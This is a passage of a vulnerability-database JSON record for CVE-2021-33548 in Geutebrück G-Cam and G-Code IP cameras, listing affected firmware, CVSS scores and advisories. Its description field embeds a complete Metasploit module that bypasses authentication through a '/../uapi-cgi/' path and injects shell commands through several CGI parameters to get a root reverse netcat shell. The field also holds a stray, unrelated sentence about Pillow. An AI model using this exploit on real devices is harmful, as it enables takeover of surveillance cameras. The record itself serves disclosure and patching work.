            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33548",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33548",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33548",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33548",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33548",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2089",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. \n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n    end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33548",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "id": "VAR-202109-0857",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T22:14:46.195000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Multiple  Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158069"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:22.657000",
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
